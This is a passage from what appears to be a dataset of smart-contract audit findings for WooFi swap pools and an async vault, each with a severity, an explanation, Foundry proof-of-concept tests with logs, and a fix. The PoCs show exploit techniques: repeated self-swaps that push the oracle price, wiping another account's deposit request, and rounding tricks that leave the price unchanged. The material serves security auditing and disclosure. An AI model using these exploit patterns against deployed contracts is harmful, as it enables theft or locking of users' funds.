pool.depositAll(address(usdt));\\n\\n wbtc.mint(address(this), 100e8);\\n wbtc.approve(address(pool), type(uint256).max);\\n pool.depositAll(address(wbtc));\\n }\\n\\n function testMaxPriceDriftInNormalCase() public {\\n (uint256 initPrice, bool feasible) = oracle.price(address(wbtc));\\n assertTrue(feasible);\\n assertEq(initPrice, 50_000e8);\\n\\n // buy almost all wbtc in pool\\n usdt.mint(address(this), 5_000_000e6);\\n usdt.transfer(address(pool), 5_000_000e6);\\n pool.swap({\\n fromToken: address(usdt),\\n toToken: address(wbtc),\\n fromAmount: 5_000_000e6,\\n minToAmount: 0,\\n to: address(this),\\n rebateTo: address(this)\\n });\\n\\n (uint256 pastPrice, bool feasible2) = oracle.price(address(wbtc));\\n assertTrue(feasible2);\\n uint256 drift = ((pastPrice - initPrice) * 1e5) / initPrice;\\n assertEq(drift, 502); // 0.502%\\n console2.log(\"Max price drift in normal case: \", _toPercentString(drift));\\n }\\n\\n function testUnboundPriceDriftInAttackCase() public {\\n (uint256 initPrice, bool feasible) = oracle.price(address(wbtc));\\n assertTrue(feasible);\\n assertEq(initPrice, 50_000e8);\\n\\n // top up the evil, in real case, the fund could be from a flashloan\\n wbtc.mint(evil, 100e8);\\n\\n for (uint256 i; i < 10; ++i) {\\n vm.startPrank(evil);\\n uint256 balance = wbtc.balanceOf(evil);\\n wbtc.transfer(address(pool), balance);\\n pool.swap({\\n fromToken: address(wbtc),\\n toToken: address(wbtc),\\n fromAmount: balance,\\n minToAmount: 0,\\n to: evil,\\n rebateTo: evil\\n });\\n (uint256 pastPrice, bool feasible2) = oracle.price(address(wbtc));\\n assertTrue(feasible2);\\n uint256 drift = ((pastPrice - initPrice) * 1e5) / initPrice;\\n console2.log(\"Unbound price drift in attack case: \", _toPercentString(drift)); \\n vm.stopPrank();\\n }\\n }\\n\\n function _toPercentString(uint256 drift) internal pure returns (string memory result) {\\n uint256 d_3 = drift % 10;\\n uint256 d_2 = (drift / 10) % 10;\\n uint256 d_1 = (drift / 100) % 10;\\n uint256 d0 = (drift / 1000) % 10;\\n result = string.concat(_toString(d0), \".\", _toString(d_1), _toString(d_2), _toString(d_3), \"%\");\\n uint256 d = drift / 10000;\\n while (d > 0) {\\n result = string.concat(_toString(d % 10), result);\\n d = d / 10;\\n }\\n }\\n\\n function _toString(uint256 digital) internal pure returns (string memory str) {\\n str = new string(1);\\n bytes16 symbols = \"0123456789abcdef\";\\n assembly {\\n mstore8(add(str, 32), byte(digital, symbols))\\n }\\n }\\n}\\n```\\n\\nAnd the logs:\\n```\\n2024-03-woofi-swap\\WooPoolV2> forge test --match-contract PriceManipulationAttackTest -vv\\n[⠆] Compiling// rest of codeNo files changed, compilation skipped\\n[⠰] Compiling// rest of code\\n\\nRunning 2 tests for test/foundry/PriceManipulationAttack.t.sol:PriceManipulationAttackTest\\n[PASS] testMaxPriceDriftInNormalCase() (gas: 158149)\\nLogs:\\n Max price drift in normal case: 0.502%\\n\\n[PASS] testUnboundPriceDriftInAttackCase() (gas: 648243)\\nLogs:\\n Unbound price drift in attack case: 0.499%\\n Unbound price drift in attack case: 0.998%\\n Unbound price drift in attack case: 1.496%\\n Unbound price drift in attack case: 1.994%\\n Unbound price drift in attack case: 2.491%\\n Unbound price drift in attack case: 2.988%\\n Unbound price drift in attack case: 3.483%\\n Unbound price drift in attack case: 3.978%\\n Unbound price drift in attack case: 4.473%\\n Unbound price drift in attack case: 4.967%\\n\\nTest result: ok. 2 passed; 0 failed; 0 skipped; finished in 6.59ms\\n\\nRan 1 test suites: 2 tests passed, 0 failed, 0 skipped (2 total tests)\\n```\\nч```\\n2024-03-woofi-swap\\WooPoolV2> git diff\\ndiff --git a/WooPoolV2/contracts/WooPPV2.sol b/WooPoolV2/contracts/WooPPV2.sol\\nindex e7a6ae8..9440089 100644\\n--- a/WooPoolV2/contracts/WooPPV2.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/WooPoolV2/contracts/WooPPV2.sol\\n@@ -520,6 // Add the line below\\n520,7 @@ contract WooPPV2 is Ownable, ReentrancyGuard, Pausable, IWooPPV2 {\\n ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {\\n require(baseToken1 != address(0) && baseToken1 != quoteToken, \"WooPPV2: !baseToken1\");\\n require(baseToken2 != address(0) && baseToken2 != quoteToken, \"WooPPV2: !baseToken2\");\\n// Add the line below\\n require(baseToken1 != baseToken2, \"WooPPV2: baseToken1 == baseToken2\");\\n require(to != address(0), \"WooPPV2: !to\");\\n\\n require(balance(baseToken1) - tokenInfos[baseToken1].reserve >= base1Amount, \"WooPPV2: !BASE1_BALANCE\");\\n```\\nчч```\\nFile: contracts\\WooPPV2.sol\\n function _swapBaseToBase(\\n// rest of code\\n ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {\\n require(baseToken1 != address(0) && baseToken1 != quoteToken, \"WooPPV2: !baseToken1\");\\n require(baseToken2 != address(0) && baseToken2 != quoteToken, \"WooPPV2: !baseToken2\");\\n// rest of code\\n IWooracleV2.State memory state1 = IWooracleV2(wooracle).state(baseToken1);\\n IWooracleV2.State memory state2 = IWooracleV2(wooracle).state(baseToken2);\\n// rest of code\\n uint256 newBase1Price;\\n (quoteAmount, newBase1Price) = _calcQuoteAmountSellBase(baseToken1, base1Amount, state1);\\n IWooracleV2(wooracle).postPrice(baseToken1, uint128(newBase1Price));\\n// rest of code\\n uint256 newBase2Price;\\n (base2Amount, newBase2Price) = _calcBaseAmountSellQuote(baseToken2, quoteAmount, state2);\\n IWooracleV2(wooracle).postPrice(baseToken2, uint128(newBase2Price));\\n// rest of code\\n }\\n```\\n -WooFi oracle can fail to validate its price with Chainlink price feedчmediumчThe price precision that the WooOracle uses is 8. However, if the quote token is an expensive token or the base token is a very cheap token, then the price will be too less in decimals and even \"0\" in some cases. This will lead to inefficient trades or inability to compare the woofi price with chainlink price due to chainlink price return with \"0\" value.\\nFirst, let's see how the chainlink price is calculated:\\n```\\nfunction _cloPriceInQuote(address _fromToken, address _toToken)\\n internal\\n view\\n returns (uint256 refPrice, uint256 refTimestamp)\\n {\\n address baseOracle = clOracles[_fromToken].oracle;\\n if (baseOracle == address(0)) {\\n return (0, 0);\\n }\\n address quoteOracle = clOracles[_toToken].oracle;\\n uint8 quoteDecimal = clOracles[_toToken].decimal;\\n\\n (, int256 rawBaseRefPrice, , uint256 baseUpdatedAt, ) = AggregatorV3Interface(baseOracle).latestRoundData();\\n (, int256 rawQuoteRefPrice, , uint256 quoteUpdatedAt, ) = AggregatorV3Interface(quoteOracle).latestRoundData();\\n uint256 baseRefPrice = uint256(rawBaseRefPrice);\\n uint256 quoteRefPrice = uint256(rawQuoteRefPrice);\\n\\n // NOTE: Assume wooracle token decimal is same as chainlink token decimal.\\n uint256 ceoff = uint256(10)**quoteDecimal;\\n refPrice = (baseRefPrice * ceoff) / quoteRefPrice;\\n refTimestamp = baseUpdatedAt >= quoteUpdatedAt ? quoteUpdatedAt : baseUpdatedAt;\\n }\\n```\\n\\nNow, let's assume the quote token is WBTC price of 60,000$ and the baseToken is tokenX that has the price of 0.0001$. When the final price is calculated atrefPrice because of the divisions in solidity, the result will be \"0\" as follows: 60_000 * 1e8 * 1e8 / 0.0001 * 1e8 = 0\\nso the return amount will be \"0\".\\nWhen the derived chainlink price is compared with woofi oracle if the chainlink price is \"0\" then the `woPriceInBound` will be set to \"true\" assuming the chainlink price is not set. However, in our case that's not the case, the price returnt \"0\" because of divisions:\\n```\\n-> bool woPriceInBound = cloPrice_ == 0 ||\\n ((cloPrice_ * (1e18 - bound)) / 1e18 <= woPrice_ && woPrice_ <= (cloPrice_ * (1e18 + bound)) / 1e18);\\n\\n if (woFeasible) {\\n priceOut = woPrice_;\\n feasible = woPriceInBound;\\n }\\n```\\n\\nIn such scenario, the chainlink comparison between woofi and chainlink price will not give correct results. The oracle will not be able to detect whether the chainlink price is in \"bound\" with the woofi's returnt price.\\nThis also applies if a baseToken price crushes. If the token price gets very less due to market, regardless of the quoteToken being WBTC or USDC the above scenario can happen.чPrecision of \"8\" is not enough on most of the cases. I'd suggest return the oracle price in \"18\" decimals to get more room on rounding.чOracle will fail to do a validation of its price with the chainlink price.ч```\\nfunction _cloPriceInQuote(address _fromToken, address _toToken)\\n internal\\n view\\n returns (uint256 refPrice, uint256 refTimestamp)\\n {\\n address baseOracle = clOracles[_fromToken].oracle;\\n if (baseOracle == address(0)) {\\n return (0, 0);\\n }\\n address quoteOracle = clOracles[_toToken].oracle;\\n uint8 quoteDecimal = clOracles[_toToken].decimal;\\n\\n (, int256 rawBaseRefPrice, , uint256 baseUpdatedAt, ) = AggregatorV3Interface(baseOracle).latestRoundData();\\n (, int256 rawQuoteRefPrice, , uint256 quoteUpdatedAt, ) = AggregatorV3Interface(quoteOracle).latestRoundData();\\n uint256 baseRefPrice = uint256(rawBaseRefPrice);\\n uint256 quoteRefPrice = uint256(rawQuoteRefPrice);\\n\\n // NOTE: Assume wooracle token decimal is same as chainlink token decimal.\\n uint256 ceoff = uint256(10)**quoteDecimal;\\n refPrice = (baseRefPrice * ceoff) / quoteRefPrice;\\n refTimestamp = baseUpdatedAt >= quoteUpdatedAt ? quoteUpdatedAt : baseUpdatedAt;\\n }\\n```\\n -Swaps can happen without changing the price for the next trade due to gamma = 0чmediumчWhen a swap happens in WoofiPool the price is updated accordingly respect to such value \"gamma\". However, there are some cases where the swap results to a \"gamma\" value of \"0\" which will not change the new price for the next trade.\\nThis is how the quote token received and new price is calculated when given amount of base tokens are sold to the pool:\\n```\\nfunction _calcQuoteAmountSellBase(\\n address baseToken,\\n uint256 baseAmount,\\n IWooracleV2.State memory state\\n ) private view returns (uint256 quoteAmount, uint256 newPrice) {\\n require(state.woFeasible, \"WooPPV2: !ORACLE_FEASIBLE\");\\n\\n DecimalInfo memory decs = decimalInfo(baseToken);\\n\\n // gamma = k * price * base_amount; and decimal 18\\n uint256 gamma;\\n {\\n uint256 notionalSwap = (baseAmount * state.price * decs.quoteDec) / decs.baseDec / decs.priceDec;\\n require(notionalSwap <= tokenInfos[baseToken].maxNotionalSwap, \"WooPPV2: !maxNotionalValue\");\\n\\n gamma = (baseAmount * state.price * state.coeff) / decs.priceDec / decs.baseDec;\\n require(gamma <= tokenInfos[baseToken].maxGamma, \"WooPPV2: !gamma\");\\n\\n // Formula: quoteAmount = baseAmount * oracle.price * (1 - oracle.k * baseAmount * oracle.price - oracle.spread)\\n quoteAmount =\\n (((baseAmount * state.price * decs.quoteDec) / decs.priceDec) *\\n (uint256(1e18) - gamma - state.spread)) /\\n 1e18 /\\n decs.baseDec;\\n }\\n\\n // newPrice = oracle.price * (1 - k * oracle.price * baseAmount)\\n newPrice = ((uint256(1e18) - gamma) * state.price) / 1e18;\\n }\\n```\\n\\nNow, let's assume: DAI is quoteToken, 18 decimals tokenX is baseToken which has a price of 0.01 DAI, 18 decimals coefficient = 0.000000001 * 1e18 spread = 0.001 * 1e18 baseAmount (amount of tokenX are sold) = 1e10;\\nfirst calculate the gamma: (baseAmount * state.price * state.coeff) / decs.priceDec / decs.baseDec; = 1e10 * 0.01 * 1e8 * 0.000000001 * 1e18 / 1e8 / 1e18 = 0 due to round down\\nlet's calculate the `quoteAmount` will be received: `quoteAmount` = (((baseAmount * state.price * decs.quoteDec) / decs.priceDec) * (uint256(1e18) - gamma - state.spread)) / 1e18 / decs.baseDec; (1e10 * 0.01 * 1e8 * 1e18 / 1e8) * (1e18 - 0 - 0.01 * 1e18) / 1e18 / 1e18 = 99900000 which is not \"0\".\\nlet's calculate the new price: newPrice = ((uint256(1e18) - gamma) * state.price) / 1e18; = (1e18 - 0) * 0.01 * 1e8 / 1e18 = 0.01 * 1e8 which is the same price, no price changes!\\nThat would also means if the \"gamma\" is \"0\", then this is the best possible swap outcome. If a user does this in a for loop multiple times in a cheap network, user can trade significant amount of tokens without changing the price.\\nCoded PoC (values are the same as in the above textual scenario):\\n```\\nfunction test_SwapsHappenPriceIsNotUpdatedDueToRoundDown() public {\\n // USDC --> DAI address, mind the naming..\\n uint usdcAmount = 1_000_000 * 1e18;\\n uint wooAmount = 100_000 * 1e18;\\n uint wethAmount = 1_000 * 1e18;\\n deal(USDC, ADMIN, usdcAmount);\\n deal(WOO, ADMIN, wooAmount);\\n deal(WETH, ADMIN, wethAmount);\\n\\n vm.startPrank(ADMIN);\\n IERC20(USDC).approve(address(pool), type(uint256).max);\\n IERC20(WOO).approve(address(pool), type(uint256).max);\\n IERC20(WETH).approve(address(pool), type(uint256).max);\\n pool.depositAll(USDC);\\n pool.depositAll(WOO);\\n pool.depositAll(WETH);\\n vm.stopPrank();\\n\\n uint wooAmountForTapir = 1e10 * 1000;\\n vm.startPrank(TAPIR);\\n deal(WOO, TAPIR, wooAmountForTapir);\\n IERC20(USDC).approve(address(router), type(uint256).max);\\n IERC20(WOO).approve(address(router), type(uint256).max);\\n IERC20(WETH).approve(address(router), type(uint256).max);\\n vm.stopPrank();\\n\\n // WHERE THE MAGIC HAPPENS\\n (uint128 price, ) = oracle.woPrice(WOO);\\n console.log(\"price\", price);\\n \\n uint cumulative;\\n for (uint i = 0; i < 1000; ++i) {\\n vm.prank(TAPIR);\\n cumulative += router.swap(WOO, USDC, wooAmountForTapir / 1000, 0, payable(TAPIR), TAPIR);\\n }\\n\\n (uint128 newPrice, ) = oracle.woPrice(WOO);\\n console.log(\"price\", price);\\n\\n // price hasnt changed although there are significant amount of tokens are being traded by TAPIR\\n assertEq(newPrice, price);\\n }\\n```\\nчif the \"gamma\" is \"0\", then revert.чAs by design, the price should change after every trade irrelevant of the amount that is being traded. Also, in a cheap network the attack can be quite realistic. Hence, I'll label this as medium.ч```\\nfunction _calcQuoteAmountSellBase(\\n address baseToken,\\n uint256 baseAmount,\\n IWooracleV2.State memory state\\n ) private view returns (uint256 quoteAmount, uint256 newPrice) {\\n require(state.woFeasible, \"WooPPV2: !ORACLE_FEASIBLE\");\\n\\n DecimalInfo memory decs = decimalInfo(baseToken);\\n\\n // gamma = k * price * base_amount; and decimal 18\\n uint256 gamma;\\n {\\n uint256 notionalSwap = (baseAmount * state.price * decs.quoteDec) / decs.baseDec / decs.priceDec;\\n require(notionalSwap <= tokenInfos[baseToken].maxNotionalSwap, \"WooPPV2: !maxNotionalValue\");\\n\\n gamma = (baseAmount * state.price * state.coeff) / decs.priceDec / decs.baseDec;\\n require(gamma <= tokenInfos[baseToken].maxGamma, \"WooPPV2: !gamma\");\\n\\n // Formula: quoteAmount = baseAmount * oracle.price * (1 - oracle.k * baseAmount * oracle.price - oracle.spread)\\n quoteAmount =\\n (((baseAmount * state.price * decs.quoteDec) / decs.priceDec) *\\n (uint256(1e18) - gamma - state.spread)) /\\n 1e18 /\\n decs.baseDec;\\n }\\n\\n // newPrice = oracle.price * (1 - k * oracle.price * baseAmount)\\n newPrice = ((uint256(1e18) - gamma) * state.price) / 1e18;\\n }\\n```\\n -In the function _handleERC20Received, the fee was incorrectly chargedчmediumчIn the function _handleERC20Received, the fee was incorrectly charged.\\nIn the contract, when external swap occurs, a portion of the fee will be charged. However, in function _handleERC20Received, the fee is also charged in internal swap.\\n```\\n} else {\\n // Deduct the external swap fee\\n uint256 fee = (bridgedAmount * dstExternalFeeRate) / FEE_BASE;\\n bridgedAmount -= fee; // @@audit: fee should not be applied to internal swap \\n\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n if (dst1inch.swapRouter != address(0)) {\\n try\\n wooRouter.externalSwap(\\n```\\n\\nAt the same time, when the internal swap fails, this part of the fee will not be returned to the user.чApply fee calculation only to external swaps.\\n```\\nfunction _handleERC20Received(\\n uint256 refId,\\n address to,\\n address toToken,\\n address bridgedToken,\\n uint256 bridgedAmount,\\n uint256 minToAmount,\\n Dst1inch memory dst1inch\\n) internal {\\n address msgSender = _msgSender();\\n\\n // // rest of code\\n\\n } else {\\n if (dst1inch.swapRouter != address(0)) {\\n // Deduct the external swap fee\\n uint256 fee = (bridgedAmount * dstExternalFeeRate) / FEE_BASE;\\n bridgedAmount -= fee; \\n\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n try\\n wooRouter.externalSwap(\\n // // rest of code\\n )\\n returns (uint256 realToAmount) {\\n emit WooCrossSwapOnDstChain(\\n // // rest of code\\n );\\n } catch {\\n bridgedAmount += fee;\\n TransferHelper.safeTransfer(bridgedToken, to, bridgedAmount);\\n emit WooCrossSwapOnDstChain(\\n // // rest of code\\n );\\n }\\n } else {\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n try wooRouter.swap(bridgedToken, toToken, bridgedAmount, minToAmount, payable(to), to) returns (\\n uint256 realToAmount\\n ) {\\n // // rest of code\\n } catch {\\n // // rest of code\\n }\\n }\\n }\\n}\\n```\\nчInternal swaps are incorrectly charged, and fees are not refunded when internal swap fail.ч```\\n} else {\\n // Deduct the external swap fee\\n uint256 fee = (bridgedAmount * dstExternalFeeRate) / FEE_BASE;\\n bridgedAmount -= fee; // @@audit: fee should not be applied to internal swap \\n\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n if (dst1inch.swapRouter != address(0)) {\\n try\\n wooRouter.externalSwap(\\n```\\n -Claim functions don't validate if the epoch is settledчhighчBoth claim functions fail to validate if the epoch for the request has been already settled, leading to loss of funds when claiming requests for the current epoch. The issue is worsened as `claimAndRequestDeposit()` can be used to claim a deposit on behalf of any account, allowing an attacker to wipe other's requests.\\nWhen the vault is closed, users can request a deposit, transfer assets and later claim shares, or request a redemption, transfer shares and later redeem assets. Both of these processes store the assets or shares, and later convert these when the epoch is settled. For deposits, the core of the implementation is given by _claimDeposit():\\n```\\nfunction _claimDeposit(\\n address owner,\\n address receiver\\n)\\n internal\\n returns (uint256 shares)\\n{\\n shares = previewClaimDeposit(owner);\\n\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n epochs[lastRequestId].depositRequestBalance[owner] = 0;\\n _update(address(claimableSilo), receiver, shares);\\n emit ClaimDeposit(lastRequestId, owner, receiver, assets, shares);\\n}\\n\\nfunction previewClaimDeposit(address owner) public view returns (uint256) {\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n return _convertToShares(assets, lastRequestId, Math.Rounding.Floor);\\n}\\n\\nfunction _convertToShares(\\n uint256 assets,\\n uint256 requestId,\\n Math.Rounding rounding\\n)\\n internal\\n view\\n returns (uint256)\\n{\\n if (isCurrentEpoch(requestId)) {\\n return 0;\\n }\\n uint256 totalAssets =\\n epochs[requestId].totalAssetsSnapshotForDeposit + 1;\\n uint256 totalSupply =\\n epochs[requestId].totalSupplySnapshotForDeposit + 1;\\n\\n return assets.mulDiv(totalSupply, totalAssets, rounding);\\n}\\n```\\n\\nAnd for redemptions in _claimRedeem():\\n```\\nfunction _claimRedeem(\\n address owner,\\n address receiver\\n)\\n internal\\n whenNotPaused\\n returns (uint256 assets)\\n{\\n assets = previewClaimRedeem(owner);\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n uint256 shares = epochs[lastRequestId].redeemRequestBalance[owner];\\n epochs[lastRequestId].redeemRequestBalance[owner] = 0;\\n _asset.safeTransferFrom(address(claimableSilo), address(this), assets);\\n _asset.transfer(receiver, assets);\\n emit ClaimRedeem(lastRequestId, owner, receiver, assets, shares);\\n}\\n\\nfunction previewClaimRedeem(address owner) public view returns (uint256) {\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n uint256 shares = epochs[lastRequestId].redeemRequestBalance[owner];\\n return _convertToAssets(shares, lastRequestId, Math.Rounding.Floor);\\n}\\n\\nfunction _convertToAssets(\\n uint256 shares,\\n uint256 requestId,\\n Math.Rounding rounding\\n)\\n internal\\n view\\n returns (uint256)\\n{\\n if (isCurrentEpoch(requestId)) {\\n return 0;\\n }\\n uint256 totalAssets = epochs[requestId].totalAssetsSnapshotForRedeem + 1;\\n uint256 totalSupply = epochs[requestId].totalSupplySnapshotForRedeem + 1;\\n\\n return shares.mulDiv(totalAssets, totalSupply, rounding);\\n}\\n```\\n\\nNote that in both cases the \"preview\" functions are used to convert and calculate the amounts owed to the user: `_convertToShares()` and `_convertToAssets()` use the settled values stored in `epochs[requestId]` to convert between assets and shares.\\nHowever, there is no validation to check if the claiming is done for the current unsettled epoch. If a user claims a deposit or redemption during the same epoch it has been requested, the values stored in `epochs[epochId]` will be uninitialized, which means that `_convertToShares()` and `_convertToAssets()` will use zero values leading to zero results too. The claiming process will succeed, but since the converted amounts are zero, the users will always get zero assets or shares.\\nThis is even worsened by the fact that `claimAndRequestDeposit()` can be used to claim a deposit on behalf of any `account`. An attacker can wipe any requested deposit from an arbitrary `account` by simply calling `claimAndRequestDeposit(0, `account`, \"\")`. This will internally execute `_claimDeposit(account, account)`, which will trigger the described issue.\\nThe following proof of concept demonstrates the scenario in which a user claims their own deposit during the current epoch:\\n```\\nfunction test_ClaimSameEpochLossOfFunds_Scenario_A() public {\\n asset.mint(alice, 1_000e18);\\n\\n vm.prank(alice);\\n vault.deposit(500e18, alice);\\n\\n // vault is closed\\n vm.prank(owner);\\n vault.close();\\n\\n // alice requests a deposit\\n vm.prank(alice);\\n vault.requestDeposit(500e18, alice, alice, \"\");\\n\\n // the request is successfully created\\n assertEq(vault.pendingDepositRequest(alice), 500e18);\\n\\n // now alice claims the deposit while vault is still open\\n vm.prank(alice);\\n vault.claimDeposit(alice);\\n\\n // request is gone\\n assertEq(vault.pendingDepositRequest(alice), 0);\\n}\\n```\\n\\nThis other proof of concept illustrates the scenario in which an attacker calls `claimAndRequestDeposit()` to wipe the deposit of another account.\\n```\\nfunction test_ClaimSameEpochLossOfFunds_Scenario_B() public {\\n asset.mint(alice, 1_000e18);\\n\\n vm.prank(alice);\\n vault.deposit(500e18, alice);\\n\\n // vault is closed\\n vm.prank(owner);\\n vault.close();\\n\\n // alice requests a deposit\\n vm.prank(alice);\\n vault.requestDeposit(500e18, alice, alice, \"\");\\n\\n // the request is successfully created\\n assertEq(vault.pendingDepositRequest(alice), 500e18);\\n\\n // bob can issue a claim for alice through claimAndRequestDeposit()\\n vm.prank(bob);\\n vault.claimAndRequestDeposit(0, alice, \"\");\\n\\n // request is gone\\n assertEq(vault.pendingDepositRequest(alice), 0);\\n}\\n```\\nчCheck that the epoch associated with the request is not the current epoch.\\n```\\n function _claimDeposit(\\n address owner,\\n address receiver\\n )\\n internal\\n returns (uint256 shares)\\n {\\n// Add the line below\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n// Add the line below\\n if (isCurrentEpoch(lastRequestId)) revert();\\n \\n shares = previewClaimDeposit(owner);\\n\\n// Remove the line below\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n epochs[lastRequestId].depositRequestBalance[owner] = 0;\\n _update(address(claimableSilo), receiver, shares);\\n emit ClaimDeposit(lastRequestId, owner, receiver, assets, shares);\\n }\\n```\\n\\n```\\n function _claimRedeem(\\n address owner,\\n address receiver\\n )\\n internal\\n whenNotPaused\\n returns (uint256 assets)\\n {\\n// Add the line below\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n// Add the line below\\n if (isCurrentEpoch(lastRequestId)) revert();\\n \\n assets = previewClaimRedeem(owner);\\n// Remove the line below\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n uint256 shares = epochs[lastRequestId].redeemRequestBalance[owner];\\n epochs[lastRequestId].redeemRequestBalance[owner] = 0;\\n _asset.safeTransferFrom(address(claimableSilo), address(this), assets);\\n _asset.transfer(receiver, assets);\\n emit ClaimRedeem(lastRequestId, owner, receiver, assets, shares);\\n }\\n```\\nчCRITICAL. Requests can be wiped by executing the claim in an unsettled epoch, leading to loss of funds. The issue can also be triggered for any arbitrary account by using `claimAndRequestDeposit()`.ч```\\nfunction _claimDeposit(\\n address owner,\\n address receiver\\n)\\n internal\\n returns (uint256 shares)\\n{\\n shares = previewClaimDeposit(owner);\\n\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n epochs[lastRequestId].depositRequestBalance[owner] = 0;\\n _update(address(claimableSilo), receiver, shares);\\n emit ClaimDeposit(lastRequestId, owner, receiver, assets, shares);\\n}\\n\\nfunction previewClaimDeposit(address owner) public view returns (uint256) {\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n return _convertToShares(assets, lastRequestId, Math.Rounding.Floor);\\n}\\n\\nfunction _convertToShares(\\n uint256 assets,\\n uint256 requestId,\\n Math.Rounding rounding\\n)\\n internal\\n view\\n returns (uint256)\\n{\\n if (isCurrentEpoch(requestId)) {\\n return 0;\\n }\\n uint256 totalAssets =\\n epochs[requestId].totalAssetsSnapshotForDeposit + 1;\\n uint256 totalSupply =\\n epochs[requestId].totalSupplySnapshotForDeposit + 1;\\n\\n return assets.mulDiv(totalSupply, totalAssets, rounding);\\n}\\n```\\n -Calling `requestRedeem` with `_msgSender() != owner` will lead to user's shares being locked in the vault foreverчhighчThe `requestRedeem` function in `AsyncSynthVault.sol` can be invoked by a user on behalf of another user, referred to as 'owner', provided that the user has been granted sufficient allowance by the 'owner'. However, this action results in a complete loss of balance.\\nThe `_createRedeemRequest` function contains a discrepancy; it fails to update the `lastRedeemRequestId` for the user eligible to claim the shares upon maturity. Instead, it updates this identifier for the 'owner' who delegated their shares to the user. As a result, the shares become permanently locked in the vault, rendering them unclaimable by either the 'owner' or the user.\\nThis issue unfolds as follows:\\nThe 'owner' deposits tokens into the vault, receiving vault `shares` in return.\\nThe 'owner' then delegates the allowance of all their vault `shares` to another user.\\nWhen `epochId == 1`, this user executes The `requestRedeem` , specifying the 'owner''s address as `owner`, the user's address as `receiver`, and the 'owner''s share balance as `shares`.\\nThe internal function `_createRedeemRequest` is invoked, incrementing `epochs[epochId].redeemRequestBalance[receiver]` by the amount of `shares`, and setting `lastRedeemRequestId[owner] = epochId`.\\nAt `epochId == 2`, the user calls `claimRedeem`, which in turn calls the internal function `_claimRedeem`, with `owner` set to `_msgSender()` (i.e., the user's address) and `receiver` also set to the user's address.\\nIn this scenario, `lastRequestId` remains zero because `lastRedeemRequestId[owner] == 0` (here, `owner` refers to the user's address). Consequently, `epochs[lastRequestId].redeemRequestBalance[owner]` is also zero. Therefore, no `shares` are minted to the user.\\nProof of Code :\\nThe following test demonstrates the claim made above :\\n```\\nfunction test_poc() external {\\n // set token balances\\n deal(vaultTested.asset(), user1.addr, 20); // owner\\n\\n vm.startPrank(user1.addr);\\n IERC20Metadata(vaultTested.asset()).approve(address(vaultTested), 20);\\n // owner deposits tokens when vault is open and receives vault shares\\n vaultTested.deposit(20, user1.addr);\\n // owner delegates shares balance to user\\n IERC20Metadata(address(vaultTested)).approve(\\n user2.addr,\\n vaultTested.balanceOf(user1.addr)\\n );\\n vm.stopPrank();\\n\\n // vault is closed\\n vm.prank(vaultTested.owner());\\n vaultTested.close();\\n\\n // epoch = 1\\n vm.startPrank(user2.addr);\\n // user requests a redeem on behlaf of owner\\n vaultTested.requestRedeem(\\n vaultTested.balanceOf(user1.addr),\\n user2.addr,\\n user1.addr,\\n \"\"\\n );\\n // user checks the pending redeem request amount\\n assertEq(vaultTested.pendingRedeemRequest(user2.addr), 20);\\n vm.stopPrank();\\n\\n vm.startPrank(vaultTested.owner());\\n IERC20Metadata(vaultTested.asset()).approve(\\n address(vaultTested),\\n type(uint256).max\\n );\\n vaultTested.settle(23); // an epoch goes by\\n vm.stopPrank();\\n\\n // epoch = 2\\n\\n vm.startPrank(user2.addr);\\n // user tries to claim the redeem\\n vaultTested.claimRedeem(user2.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n // however, token balance of user is still empty\\n vm.stopPrank();\\n\\n vm.startPrank(user1.addr);\\n // owner also tries to claim the redeem\\n vaultTested.claimRedeem(user1.addr);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n // however, token balance of owner is still empty\\n vm.stopPrank();\\n\\n // all the balances of owner and user are zero, indicating loss of funds\\n assertEq(vaultTested.balanceOf(user1.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user1.addr), 0);\\n assertEq(vaultTested.balanceOf(user2.addr), 0);\\n assertEq(IERC20Metadata(vaultTested.asset()).balanceOf(user2.addr), 0);\\n }\\n```\\n\\nTo run the test :\\nCopy the above code and paste it into `TestClaimDeposit.t.sol`\\nRun `forge test --match-test test_poc --ffi`чModify `_createRedeemRequest` as follows :\\n```\\n// Remove the line below\\n lastRedeemRequestId[owner] = epochId;\\n// Add the line below\\n lastRedeemRequestid[receiver] = epochId;\\n```\\nчThe shares are locked in the vault forever with no method for recovery by the user or the 'owner'.ч```\\nfunction test_poc() external {\\n // set token balances\\n deal(vaultTested.asset(), user1.addr, 20); // owner\\n\\n vm.startPrank(user1.addr);\\n IERC20Metadata(vaultTested.asset()).approve(address(vaultTested), 20);\\n // owner deposits tokens when vault is open and receives vault shares\\n vaultTested.deposit(20, user1.addr);\\n // owner delegates shares balance to user\\n IERC20Metadata(address(vaultTested)).approve(\\n user2.addr,\\n vaultTested.balanceOf(user1.addr)\\n );\\n vm.stopPrank();\\n\\n // vault is closed\\n vm.prank(vaultTested.owner());\\n vaultTested.close();\\n\\n // epoch = 1\\n vm.startPrank(user2.addr);\\n // user requests a redeem on behlaf of owner\\n vaultTested.requestRedeem(\\n vaultTested.balanceOf(user1.addr),\\n user2.addr,\\n user1.addr,\\n \"\"\\n );\\n // user checks the pending redeem request 